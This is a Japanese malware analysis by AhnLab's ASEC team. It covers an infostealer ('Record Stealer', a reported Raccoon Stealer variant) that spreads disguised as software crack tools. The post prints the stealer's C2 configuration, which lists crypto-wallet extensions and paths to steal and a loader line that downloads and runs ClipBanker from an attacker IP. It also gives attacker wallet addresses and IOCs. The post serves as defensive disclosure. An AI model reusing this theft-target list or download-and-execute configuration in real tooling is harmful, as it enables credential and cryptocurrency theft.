新種の情報窃取マルウェア、クラックツールに偽装して拡散中

ASEC 分析チームは、ソフトウェアのクラックツールおよびインストーラーに偽装して拡散するマルウェアを多数紹介してきた。CryptBot、RedLine、Vidar マルウェアが代表的なものとしてあげられる。最近では単一マルウェアの形態をとる RedLine マルウェアが自身を隠して拡散している。(Dropper タイプとして拡散中)さらに新種の情報窃取マルウェアが活発に配布されている。5月20日ごろから本格的に配布され始め、韓国国外では当該マルウェアを「Recordbreaker Stealer」とカテゴライズしており、Raccoon Stealer の新たなバージョンであるとの解析結果もある。

図1.  マルウェア配布ページ

検索エンジンで商用ソフトウェアのクラックツール、シリアル、インストーラーなどを検索して配布ページにアクセスし、圧縮ファイルをダウンロードおよび解凍するとマルウェアが生成される。

このマルウェアは主に大容量のパディング領域を追加して、異常にファイルサイズを大きくして配布される。構造を見ると、最後のセクションと証明書の領域の間に大容量のパディングが挿入されている。

そのため、配布元からダウンロードした圧縮ファイルのサイズは 3~7MB であるが、解凍時に生成されるマルウェアは 300~700MB まで増加する。マルウェアのアイコンは、主にインストーラーを連想させるものであり、有名なソフトウェアのアイコンを使用することもある。このような方法以外にも、典型的なパック形式として Dropper もしくはダウンローダーによって配布されるケースもある。

図2. マルウェアのアイコン

マルウェアを実行すると、C2 のコマンド(設定値)によって追加ライブラリをダウンロードし、ユーザー PC にある各機密情報を収集し、C2に転送する。この時、情報窃取の対象も C2 の設定によって決定され、追加のマルウェアをインストールする場合もある。全体的な実行フローに対するネットワークの振る舞いは以下の通りである。

図3. ネットワークの振る舞いの情報

初回 C2 接続時は、ユーザー名、MachineGUID 値、サンプル内のハードコーディングされたキー値を転送し、マルウェアの設定データを受信する。設定データは情報窃取対象リスト、情報収集に必要なライブラリのダウンロードアドレスが明示されている。

図4. 初回 C2 送信パケット
図5. C2 設定データの受信パケット

初期サンプルでは C2 用のドメインと、ライブラリダウンロード用のドメインがそれぞれ異なっていたが、最近配布されているサンプルでは同じアドレスを使用している。C2 の寿命は非常に短く、1日の間に2~3個の新たな C2 ドメインを持つサンプルが拡散している。C2 通信時、User-Agent 値として「record」の文字列を使用するのが特徴である。

図6. C2 通信時の User-Agent

設定データに存在する窃取対象は、Web ブラウザのウォレットプラグイン、オープンソースウォレットなど、仮想通貨関連の文字列が大半であり、Web ブラウザの Cookie、アカウントおよびパスワードなどの基本的な情報の窃取行為については、基本的にそれと関連するライブラリが存在する場合に行われるものと見られる。以下は解析対象のサンプルの設定データの例である。

libs_nss3:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll libs_msvcp140:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll libs_vcruntime140:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll libs_mozglue:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll libs_freebl3:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll libs_softokn3:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll ews_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings
ews_tronl:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings libs_sqlite3:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
ews_bsc:fhbohimaelbohpjbbldcngcnapndodjp;BinanceChain;Local Extension Settings
ews_ronin:fnjhmkhhmkbjkkabndcnnogagogbneec;Ronin;Local Extension Settings
wlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*
wlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*
wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
wlts_binance:Binance;26;Binance;*app-store.*;-
wlts_coinomi:Coinomi;28;Coinomi\Coinomi\wallets;*;-
wlts_electrum:Electrum;26;Electrum\wallets;*;-
wlts_elecltc:Electrum-LTC;26;Electrum-LTC\wallets;*;-
wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
wlts_guarda:Guarda;26;Guarda;*;*cache*,*IndexedDB*
wlts_green:BlockstreamGreen;28;Blockstream\Green;*;cache,gdk,*logs*
wlts_ledger:Ledger Live;26;Ledger Live;*;*cache*,*dictionar*,*sqlite*
ews_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings
ews_meta:nkbihfbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settings
sstmnfo_System Info.txt:System Information:
|Installed applications:
|
libs_nssdbm3:http://146.19.247[.28/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll
wlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar* wlts_mymonero:MyMonero;26;MyMonero;*;*cache*
wlts_xmr:Monero;5;Monero\\wallets;*.keys;- wlts_wasabi:Wasabi;26;WalletWasabi\\Client;*;*tor*,*log* ews_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings
ews_xdefi:hmeobnfnfcmdkdcmlblgagmfpfboieaf;XDEFI;IndexedDB ews_waveskeeper:lpilbniiabackdjcionkobglmddfbcjo;WavesKeeper;Local Extension Settings ews_solflare:bhhhlbepdkbapadjdnnojkbgioiodbic;Solflare;Local Extension Settings ews_rabby:acmacodkjbdgmoleebolmdjonilkdbch;Rabby;Local Extension Settings
ews_cyano:dkdedlpgdmmkkfjabffeganieamfklkm;CyanoWallet;Local Extension Settings ews_coinbase:hnfanknocfeofbddgcijnmhnfnkdnaad;Coinbase;IndexedDB
ews_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings
ews_khc:hcflpincpppdclinealmandijcmnkbgn;KHC;Local Extension Settings
ews_tezbox:mnfifefkajgofkcjkemidiaecocnkjeh;TezBox;Local Extension Settings
ews_coin98:aeachknmefphepccionboohckonoeemg;Coin98;Local Extension Settings
ews_temple:ookjlbkiijinhpmnjffcofjonbfbgaoc;Temple;Local Extension Settings
ews_iconex:flpiciilemghbmfalicajoolhkkenfel;ICONex;Local Extension Settings
ews_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Extension Settings
ews_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings ews_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWallet;Local Extension Settings ews_neoline:cphhlgmgameodnhkjdmkpanlelnlohao;NeoLine;Local Extension Settings
ews_keplr:dmkamcknogkgcdfhhbddcghachkejeap;Keplr;Local Extension Settings
ews_terra_e:ajkhoeiiokighlmdnlakpjfoobnjinie;TerraStation;Local Extension Settings
ews_terra:aiifbnbfobpmeekipheeijimdpnlpgpp;TerraStation;Local Extension Settings ews_liquality:kpfopkelmapcoipemfendmdcghnegimn;Liquality;Local Extension Settings ews_saturn:nkddgncdjgjfcddamfgcmfnlhccnimig;SaturnWallet;Local Extension Settings ews_guild:nanjmdknhkinifnkgdcggcfnhdaammmj;GuildWallet;Local Extension Settings ews_phantom:bfnaelmomeimhlpmgjnjophhpkkoljpa;Phantom;Local Extension Settings ews_tronlink:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings
ews_brave:odbfpeeihdkbihmopkbjmoonfanlbfcl;Brave;Local Extension Settings
ews_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings
ews_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings
ews_mewcx:nlbmnnijcnlegkjjpcfjclmcfggfefdm;MEW_CX;Sync Extension Settings
ews_ton:cgeeodpfagjceefieflmdfphplkenlfk;TON;Local Extension Settings
ews_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settings
ews_ton_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settings
scrnsht_Screenshot.jpeg:1
tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*
token:e1cf7053cd9066b051c048495a128811  
表1.  C2 応答設定データの全文

このサンプルは、システムの基本情報およびインストールプログラムのリスト、スクリーンショット、Web ブラウザの保存データ、各暗号通貨ウォレット情報などを窃取する。窃取対象は C2 の返しに応じて異なることがあり、スクリーンショット窃取機能ではなく、デスクトップとマイ ドキュメントの下位に存在するすべての txt ファイルを窃取するコマンドを持つ C2 も確認されている。

図7. 窃取データの一部 (Chrome ブラウザ)

また、6月17日からは、C2 では情報窃取に使われるライブラリ以外に、追加でマルウェアをダウンロードして実行する設定値を返している。現時点でインストールされるマルウェアは ClipBanker (74744fc068f935608dff34ecd0eb1f96)である。これは、タスクスケジューラーに登録することでシステムに常駐し、クリップボードの仮想通貨ウォレットアドレスの文字列を攻撃者のウォレットアドレスの文字列に変更する行為を行う。関連サンプルの発生履歴を見ると、拡散初期にもこのような追加マルウェアのインストールプロセスがあったことが把握できた。

情報窃取後、ClipBanker マルウェアをインストールする行為は、本記事で取り上げたマルウェアと同じ方式で配布される CryptBot マルウェアと類似している。現在、CryptBot マルウェアや本記事で取り上げたマルウェアは活発に配布されている。

ldr_1:http://94.158.244[.119/U4N9B5X5F5K2A0L4L4T5/84897964387342609301.bin|%TEMP%|exe
表2.  追加マルウェアのインストール設定値
図8. ClipBanker マルウェアによるタスクスケジューラへの登録

攻撃者のウォレットアドレスの一部は以下の通りである。

BTC
19iQuuqoVQPAtRhzm4GvNuM3bj4Nm29ByX
32h53ccRQW6Vyw4rqR22xmip34WcC6pnFL
bc1qnd4p4vh6zvq68s7m70dvuzejfq2rfmqdlzmmse
ETH
0xF22ffD5be6efc35390dfD044B7156CC56C5d41f8
DASH
Xb2miQJ1JjBJA6CTh1GYfDnzduSfRacTVg
DOGE
D7kjwr9bTZCd4u8ws7KLvKsv71ai53vppJ
LTC
LUYBs28KD92zYYjG28gWq9GFvvsWE6KoeN
表3.  変更するウォレットアドレス

Record Stealer コード内部の特徴としては、自身で使用する文字列を復号化する際に、意味のある文字列をキーとして使用することがあげられる。初期は「credit19」文字列をキーとして使用しており、5月28日以降に配布されているサンプルは「edinayarossiya」文字列を使用している。

図9. RC4 キーの変化
図10. 文字列の翻訳結果

また、サンプル内にはユーザーのシステムロケール(言語)がロシアであるかを確認するコードが存在するが、この結果によって振る舞いに差は起こらない。

図11. ロシア環境であるかを確認するコード

本記事の場合と同じく、クラックツールに偽装して拡散するマルウェアは変形が活発に行われ、配布量も多いため、ユーザーは注意する必要がある。信頼できるページからダウンロードする必要があり、特に何度もリダイレクションしてダウンロードされる実行ファイルは、大半が不正なファイルである確率が高い。また、圧縮ファイル解凍時、容量が異常に大きい場合、本記事のマルウェア拡散のケースを疑わなければならない。

AhnLab 製品群では、本記事のマルウェアのタイプを以下のような検知名で検知している。

  • Infostealer/Win.RecordStealer.R498039
  • Infostealer/Win.RecordStealer.R500009
  • Infostealer/Win.PassStealer.R496906
  • Trojan/Win.ClipBanker.C5166957
    その他多数

配布されるサンプルの IOC 情報は以下の通りである。

[IOC 情報]

332790b27d3492dbcfb053213be95aa6
2d355ad6f26126ab10939bc68818df20
bc1d075b6bd88430bd6ba076a31a75db
4ef6f8d71a4855a4a6c87a1d09d91924
4a2c4c69b3ff3ced4b5f32621e4afb1e
ece994c1a16e969a20e859bbcc3300c2
0f8b9dddaf33692f797af885053458c0
8f8baad3738978e89aecf930a55a8840
e4f748b9433a7b31d436ae2620a5dc9f
4c4adbe5b0c006c383ada4b51d576367
3dfd7a1091eb03c8ffe03306d069081d
8cf1861aa02965cab5cf1dc1ed0821ad
42ba0500b667c71c4fbbe8f66e1b2627
445688259f0f04de4a03f0daeeccd2d9
43accad6e9abf5820c943ef2cb5c175f
3fd4c095ae9b1e99f060e7ee88244789
e8cd7da72640c0c7b89d769672d65958
90298e10dea99d7d091cfef8e15a9367
7699b02b0b1f7e26c26ebd01d65a62e7
7fce82d24080babb0e6e41ba9e79c1a3
d859c09c137225f836172bc1d4cc6f21
34df81354b6bf1f0eafa5df2a3e5f71e
971e560202527bacef605d43d0d213d0
97434bd88a152935fc38ed202f008295
ac1c7bcac4c30448c511de68ee48a146
f2feaff126f48ea93e05545edeff8c0a
72861a83b24ee675777eaeb268cea9c9
6c1405a8f9d898efcd1a7a8daa274b50
b7f90be034d815963a66195b4fd90be3
d2b11235ef8cd5b6fd8d0fb684d3b47a
755556a2d66e514997efde062e0d9a65
172aa3fedfccef804e75d3b042661bc8
02b4bc8444cbbe15c4d5cac0c64dbd40
fd6557f07bdd0e5771da4bb1613eb6aa
4086f7c1840a0eb2d625e012e837d709
9d6d5dd372b5b51e3c4ca12d9bba3eb9
d0080ca076e3ea423bdf986bca75efd8
baf62ea48663cbdae773f4204f0d2ea8
6a4e01b36a7d4f53ebc168d7477f0314
383ff41fe40807f54610dd41f7f822bc
330586deef7c0ee8e1ee22b2f9300bd3
cf763bea41f97b855ad031881cb36346
5c3e7c8e0e1f48afe73a0b4d5b99f971
465ba05174a883a48bfb911c2099d79b
47c7c7ae4eb4138c608d909242890b9b
92cfff39131418d225d1b9ae594439e9
358a4e60b39dd676e335d72b5e51b7b6
4b2d29759cffb05e3189624d65e0c68b
dd68d80e3a192c961f6e4d9f82e5e61f
22254f2affcaf0ff51f134d9d7a6cdd0
3d62a1947d7bd2e080bf01a335641758
6deaaf1ee18ce9f1c3d4e87500935dab
7c6364e6de8f2cb2ad40b277e75c254f
27c6b342acbcec0948617e6a717d3bc6
6230b5b503f3bc949d00ff9b6fb48dc8
d5e3261429d0da5d4e888fc9fa620a96
f8c5748e420dc63e9cfb5e586b52949a
6952c23c148f4c33d540ff07d16848f2
45b25bfbdc596dd652afbf9f726687e7
b49e7a4fa840f1dcb3fa32c239b407e1
5346cbbb4b4c97b45026bbc694fd2b74
10f3c06147e8c5ab5f970564680f25c4
f5051b4b9c770dc6ce3eae3b4356b699
f3ab4622e89cfcc106fc6c7be97ce812
b7ab0f8dd254d76a653e594ba9263b90
fcc8ec86b1b37000a72b2ca6e716919a
ba53ebc4c10ae6b2730eab30744a126f
21f227e36b03b02ee251e2e4bca9573b
8f05bddab4ecf2ba1d16df55a56de98f
ab5f3b6a6cbf4b9d7d4f3166a80140bd
a047cd8946a904d0de370dab092bfd5a
945240b56128fb9b334ca47726b0a87e
4a07d469ca9874200633c00f5bd76452
e7c7c64698966c7ecd71b1909be71a21
8b9498705419be67bc3063731d43777f
34371b979ad262c7af09c5dfe0418229
074e3f68a87a7eed362466c685ca4190
4aaff7576b2e0303b3f9824cb1882ee5
1ee58f92c30ffe9e80a9d1ee60bfc239
4e5637c09c9d701337f5d756f6aa8acf
a82466828dd65eb682aaab22063bef0c
f488d416591804de8c7b77ea583e31b0
0780032bf2f27c0e51b329168b562618
9415a5994e6bcde587f7aa3e1399bd93
983d1d312043bff5941497300f8fb06a
8075304d4882ac74378520238b6a681c
cb113e6c1602b81ee827d2d7bdae1800
49c15079868f62fbae8edd3c06cf8f51
9df168cb0251491729ff332a18134c20
8e372255a7cf6c739fdca41678a64b15
85a8c2bc828e9d6365516daff531722f
b5488bb8d62accf866bf193ea8acc505
cb7e2937365f8942feaad6e8487c2b06
5680fc474b9dcb3d515e49092eea2e15
2bdfa9ce4b24d5ea8c4e2c0288b44725
b89918401b0957e0921d7b267eee885d
cd0d2cc0efe15ffde0b60234e29a8005
21439ab3a7d7c960621145a14ab0bd0f
fd2ed0bcaa3bf9f9012c135a137fc329
147a555541c76cbcfe55a3e505df197c
30a3a8f1f2dd90accd705ca12fc80f74
af6537878614a6e6971fef54233f51e6
a6b8a9927c920e793d883d0b7631f8d4
b0bc998182378e73e2847975cc6f7eb3
51c6ad9eab6267925656924a351ae13b
b847cde6ce88fa03cc909b8e45ba6dba
db482eeb970193f1b0fbbe6dd4cdc5b4
d262074d37eb72681b0b85c9c79b8fe1
2f2d8b1cf3f0ca1d722013b0615ebd54
729005107f1026a3664121a0ac052504
6cb37bdcc570837923f8419e4c1b34f8
06c09cc561f860fec73a342d5948c064
a075d4bbda33545aa15f96391cefbf2b
0f4ed9b7a9ee3a80e273ce332bb11235
10a9581d0e113d9d45880165e85b67a5
d84e24263177be9ad620752ae206bd30
73cbe86945b917028d2212bec5ca595b
4574619733f885d5d39ce550ff18b6f6
8c4ffff98e9a1c72d4247e685c3a31c6
d17cf1277dcfbb1e41834b062b7a5aab
babba2eebf3e08915b3591bff3ccdce7
3d579bead2f7b3278a0f972682b99e38
f200f26210bfed9b002311f1b5198a10
616e8eb19032cedfb9441a091ae5cb64
9661191d2adb1a95984138c92f19bf30
a06c629ef9877c2c446834a7eaab3073
9f540ba449773093da2ada4923db520f
6d3dd4fc68c5598e0347a36e503f92f3
80660ba3b10b7fe4feb656c44df587d8
ab0512eb7c907b3ef2750b179346d8a1
c2fb5bef7c61dd0ac8dc59d8919d3421
a554637bf7d52643654cc35cf4e22c47
5f4f37da56a0b7426b2cb0191dd22181
c1659ba772ec431e8bb575b9e63e49a0
b572f18ab2c238165a9349df09cc72e6
8a121fd92c5ccf804f7682de0aa4f685
ab4e107e321ac19c3c090cbd6d1b8812
e4885099383aaee527615be9adc2ffb2
6493b517bc57b1b00094185c6ad3c09e
dace3c11c353e8bfc53a0947523c384f
ef2620fa2807a848931af57009c93e21
b5945e4b64ceb66622b1b8cacc61aaf5
e6a67b23ffa228e1e8b6bf5218a697a9
33d4490825907ab68948d291646d32ac
a80480873127f8a19e8c32b3e1875b10
ead5a99e6ffd50a7266490f332a3cd97
2fec9c03762951058ebedb2b05a21467
93616597668efdb867ddf7cd57770cbf
9474e5bacc81c3c9f89ea715f5dc0386
f76a39ac0554660bf42ef5183f307e98
0013a631fa834f5bc5e030915f04bae3
911218c5a4b27ed64d9468072e40fbe2
8cc96afcbafc216bad7391bd5620a1ab
8a30464e46e5f0800897c8025dc02bd0
4814dc4de03142394f933f2f8846c38d
3a77e0d698fc6b4a1e94c159a1bda8b5
5cf3f56705d8aeebd97f323840a13be9
1e2c588fd8c283645d649a599ee49869
0bf526b8701b6d0eaa0e311c1f5a6ef3
6757060c69b972cf6489383067d97820
ba9f64fb8b97a949f4fe43897a6deb56
b654223ed3a206a4891c34cb5349144c
1643c8501d99d9a031b1805769184eaf
27f82fdd3c622392caa5540ed2741eec
cf181224828ded7b37834babee5be0ef
579d7fa7639968257bc0d21385aa39fe
a75d1f6001bdd7df73e12df1a6770667
5eed20e9348acc3b71225473703de630
3295b36d17b708dfb440fa2f00e66a69
9bb5a5eef53fed1e923dce65114fe846
e38de205a3a00faa37a2131da2ba7e29
0e44093ebeaedda84484b2c2aa27b710
1d1b932e0284e99878c93fd4cf934497
308666c3b12efa97a6c0722fcad19a47
659859eccf3ca06f065a40ca4e1d0ac8
7727f9c2445997ab806dfe1f3c16f645
7f6565f4538b2167c9608f9459ebf3cd
8108d757b65227cc4428180d44cec461
87c9bd5be621a173953545353d458626
8eb5819ff908c5890f6e617f2ba31697
9b24498112ea88917df8f138f153eaff
a1925bd16eb3eb45541844a7a4c5c778
a2d05309339c936347ef5ec6ba6de599
bb88c45170f33694cad8ded6464ce67a
bee6b738b50f7de3299fa1b315f0ca93
f8a8a1a16abc8bb63435265f6f4d018e
3e2d0c1798a20041337629893cb2b2ea
5b1f089eb6b51bee30f41f21933701fc
b2efc4f86da56c893701f675f8e12f20
e729c14e3ba0a6eff92196a8047c3a08
058874fe5f95c762a3fa016faf1077a1
102ffcae7b93356fa9f026fc0ecbd87c
14027e925ba400d5d3c85269bfb85196
1aa62bee653e407407ba2c87191f9ff7
3685b25e7475717662b1e23b74d1edcd
45a4fbd5164e0e10858528a26c721c99
49a39ad81be36f89ba9f49f69f943e17
5299c2c153a12ced50c16c9ec1ca7ac1
566b3dc0343ed81b579e4a9c37046707
58a3b17d7372a1f103c1d9d45519c251
71f0b632f60d7b1ab64cdfaf4efe32b9
74c68591bcb11a3965d3a8b1db397eb7
8fd8ed5ea8f136d76ea4197aae294907
917f313839228817ae37504ce3ff8b0a
a84e969ef5ed6c1022ec5080d954d800
aaa1308971ba5bfab1f83bbb170cdb4c
ac1ab1dcd21eb9529b6b56b29206812f
b708193b603fa922880c2f95e1fce5d1
c5963cf4bb3f4ae56c42a50f0edf5988
0819aafa9f39989135d5d8653bfca06f
14852cfea97c792ca83ecbf8dfa84f18
15173dce1e7f34b1982d13504a38348a
2c005f8899716e3bb66b06faa2cbcaab
2fd256b3be897b7270701dca32e52f2b
48a089a2db266c7f98faec0e04e0d5c3
5591e0d68e650af9e5e504daa72a5e9d
8190f0e27758edb6b797ad3dc21de59a
b1fadc639f3e37ca7f074d17c43063bc
cc6bc8ed20240c6778caa26317730ebe
eb829d4dea8cf69ab505e55ac01a8ffa
f719802a1bef015e21971bebcc0657c8
563eb6fe83d4f1fe97d20fb20c672601
07ef759b069dd67294511b6991e3e494
230035168e2e6cd6f3d539d161f42732
2e8c324223dbfb13e7fa96df8cd4fc97
7f25d6f78a5584b4f40e8500eed53409
bb3cfe4e4ac4be35debbe05761a5cb2e
9c25f4974604a5f756b5b5ba55c13d38
194.180.174[.]180
94.158.244[.]213
45.142.212[.]100
45.140.146[.]169
194.180.174[.]187
194.180.174[.]186
brain-lover[.]xyz
135.181.105[.]89
load-brain[.]xyz
77.91.102[.]88
use-freedom[.]xyz
software-load[.]xyz
interactive-soft[.]xyz
77.91.103[.]31
broke-bridge[.]xyz
94.158.247[.]24
just-trust[.]xyz
really-software[.]xyz
feel-quite[.]xyz
viper-air[.]xyz
polar-gift[.]xyz
retro-rave[.]xyz
cool-story[.]xyz
fall2sleep[.]xyz
heal-brain[.]xyz
tech-lover[.]xyz
love-light[.]xyz
soft-viper[.]site
side-soft[.]site
both-those[.]xyz
violance-heck[.]site
main-soft[.]site
85.239.34[.]235
fill-empty[.]xyz
cover-you[.]site
45.67.34[.]234
45.67.34[.]238
45.142.215[.]92
fall-hire[.]site
violance-rave[.]site
45.153.230[.]183
45.152.86[.]98
74.119.193[.]57
77.91.74[.]67
146.19.247[.]28
77.91.102[.]115
45.159.251[.]21
146.19.247[.]52
45.142.215[.]50
45.150.67[.]175
45.133.216[.]170
193.43.146[.]22
193.43.146[.]26
146.70.124[.]71
193.43.146[.]17
146.19.75[.]8
45.84.0[.]152
45.133.216[.]249
45.67.34[.]152
45.133.216[.]145

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 1 vote
評価する
Subscribe
Notify of
guest

5 コメント
Inline Feedbacks
View all comments
trackback

[…] 新種の情報窃取マルウェア、クラックツールに偽装して拡散中 […]

trackback

[…] 新種の情報窃取マルウェア、クラックツールに偽装して拡散中 […]

trackback

[…] AhnLab, “新種の情報窃取マルウェア、クラックツールに偽装して拡散中”, 2022/06/28 https://asec.ahnlab.com/jp/35934/ […]

trackback

[…] 新種の情報窃取マルウェア、クラックツールに偽装して拡散中 […]